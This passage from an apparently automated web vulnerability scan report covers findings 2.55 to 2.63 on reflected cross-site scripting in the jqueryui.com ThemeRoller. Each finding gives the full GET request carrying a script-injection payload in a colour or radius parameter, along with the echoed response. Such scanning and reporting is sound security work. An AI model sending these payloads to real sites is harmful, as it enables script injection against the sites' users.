"><script>alert(1)</script>1f7af90ed7f&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000c46a8"><script>alert(1)</script>1f7af90ed7f&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&
...[SNIP]...

2.55. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f4a"><script>alert(1)</script>475d9e92991 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD42f4a"><script>alert(1)</script>475d9e92991&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD42f4a"><script>alert(1)</script>475d9e92991&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AA
...[SNIP]...

2.56. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8752b"><script>alert(1)</script>e220339ee07 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9368752b"><script>alert(1)</script>e220339ee07&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
mgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9368752b"><script>alert(1)</script>e220339ee07&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgT
...[SNIP]...

2.57. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37cb2"><script>alert(1)</script>0fa604b9a9c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF37cb2"><script>alert(1)</script>0fa604b9a9c&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF37cb2"><script>alert(1)</script>0fa604b9a9c&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC
...[SNIP]...

2.58. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e14f"><script>alert(1)</script>04d20544562 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px4e14f"><script>alert(1)</script>04d20544562&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px4e14f"><script>alert(1)</script>04d20544562&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

2.59. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d33e"><script>alert(1)</script>d4448f15dc2 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*7d33e"><script>alert(1)</script>d4448f15dc2 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
y=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*7d33e"><script>alert(1)</script>d4448f15dc2" type="text/css" media="all" />
...[SNIP]...

2.60. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c39"><script>alert(1)</script>60cd583f00d was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC38c39"><script>alert(1)</script>60cd583f00d&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC38c39"><script>alert(1)</script>60cd583f00d&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=F
...[SNIP]...

2.61. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5dc0"><script>alert(1)</script>24ffebe8c1a was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666a5dc0"><script>alert(1)</script>24ffebe8c1a&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666a5dc0"><script>alert(1)</script>24ffebe8c1a&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTex
...[SNIP]...

2.62. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dedb6"><script>alert(1)</script>f1dea2bcac was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFFdedb6"><script>alert(1)</script>f1dea2bcac&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFFdedb6"><script>alert(1)</script>f1dea2bcac&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=
...[SNIP]...

2.63. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88db2"><script>alert(1)</script>4192bd9f2a0 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B1000088db2"><script>alert(1)</script>4192bd9f2a0&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* 